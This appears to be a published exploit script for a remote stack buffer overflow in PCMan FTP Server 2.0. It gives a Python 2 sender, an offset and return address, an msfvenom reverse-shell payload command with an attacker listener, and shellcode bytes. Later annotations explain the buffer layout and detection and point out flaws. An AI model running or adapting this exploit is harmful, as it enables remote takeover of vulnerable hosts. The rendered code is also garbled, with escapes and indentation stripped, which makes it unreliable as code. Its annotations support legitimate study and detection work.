Authored by Waqas Ahmed Faroouqi

PCMan FTP Server version 2.0 pwn remote buffer overflow exploit.

# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3

#!/usr/bin/python

import socket

#buffer = 'A' * 2500
#offset = 2007
#badchars=x00x0ax0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "x00x0ax0d"
#nc -nvlp 4444

# Stage-2 payload as published on this page. The header comments describe it
# as msfvenom output (reverse shell, bad characters 0x00/0x0a/0x0d); as
# rendered here every escape appears as "x.." without its backslash, so these
# literals are plain ASCII text rather than the raw bytes that description
# implies.
overflow = (
"xdbxcexd9x74x24xf4xbaxc1x93x3axccx58x31xc9"
"xb1x52x31x50x17x03x50x17x83x01x97xd8x39x7d"
"x70x9exc2x7dx81xffx4bx98xb0x3fx2fxe9xe3x8f"
"x3bxbfx0fx7bx69x2bx9bx09xa6x5cx2cxa7x90x53"
"xadx94xe1xf2x2dxe7x35xd4x0cx28x48x15x48x55"
"xa1x47x01x11x14x77x26x6fxa5xfcx74x61xadxe1"
"xcdx80x9cxb4x46xdbx3ex37x8ax57x77x2fxcfx52"
"xc1xc4x3bx28xd0x0cx72xd1x7fx71xbax20x81xb6"
"x7dxdbxf4xcex7dx66x0fx15xffxbcx9ax8dxa7x37"
"x3cx69x59x9bxdbxfax55x50xafxa4x79x67x7cxdf"
"x86xecx83x0fx0fxb6xa7x8bx4bx6cxc9x8ax31xc3"
"xf6xccx99xbcx52x87x34xa8xeexcax50x1dxc3xf4"
"xa0x09x54x87x92x96xcex0fx9fx5fxc9xc8xe0x75"
"xadx46x1fx76xcex4fxe4x22x9exe7xcdx4ax75xf7"
"xf2x9exdaxa7x5cx71x9bx17x1dx21x73x7dx92x1e"
"x63x7ex78x37x0ex85xebxf8x67x17x6dx90x75x17"
"x63x3dxf3xf1xe9xadx55xaax85x54xfcx20x37x98"
"x2ax4dx77x12xd9xb2x36xd3x94xa0xafx13xe3x9a"
"x66x2bxd9xb2xe5xbex86x42x63xa3x10x15x24x15"
"x69xf3xd8x0cxc3xe1x20xc8x2cxa1xfex29xb2x28"
"x72x15x90x3ax4ax96x9cx6ex02xc1x4axd8xe4xbb"
"x3cxb2xbex10x97x52x46x5bx28x24x47xb6xdexc8"
"xf6x6fxa7xf7x37xf8x2fx80x25x98xd0x5bxeexb8"
"x32x49x1bx51xebx18xa6x3cx0cxf7xe5x38x8fxfd"
"x95xbex8fx74x93xfbx17x65xe9x94xfdx89x5ex94"
"xd7")

# Buffer layout, per the header comments: 2007 bytes of filler up to the saved
# return address, a 4-byte overwrite (the little-endian form of the USER32.dll
# address listed above, which is specific to the library build on the tested
# Windows XP SP3 image; Windows XP has no ASLR, so on later releases that fixed
# address would not hold), a 32-byte sled, then the payload above. From a
# detection standpoint the length alone is a reliable signature: an FTP command
# line of roughly 2 KB has no legitimate use.
shellcode = 'A' * 2007 + "x53x93x42x7e" + "x90" * 32 + overflow

# Change IP/Port as required

# The socket is created outside the try block and is closed only on the
# success path below, so it leaks on any failure. Python 2 throughout: print
# statements and str/bytes conflation.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# NOTE(review): as rendered on this page the try/except bodies carry no
# indentation, and the "\n" in the messages also lacks its backslash.
try:
print "nSending evil buffer..."
# Target host and port are hard-coded here.
s.connect(('192.168.146.135',21))
# Banner and login replies are read but never inspected (`data` is unused),
# so a rejected login or an unexpected server is not noticed before the
# oversized command is sent.
data = s.recv(1024)
s.send('USER anonymous' +'rn')
data = s.recv(1024)
s.send('PASS anonymousrn')
# The overlong 'pwd' argument is the input that overruns the server-side
# stack buffer. No reply is read afterwards, so the success message below is
# printed rather than observed.
s.send('pwd ' + shellcode + 'rn')
s.close()
print "nExploit completed successfully!."
# Bare except catches everything, including KeyboardInterrupt, and reports all
# of it as a connection failure, which hides the real cause of any error.
except:
print "Could not connect to FTP!"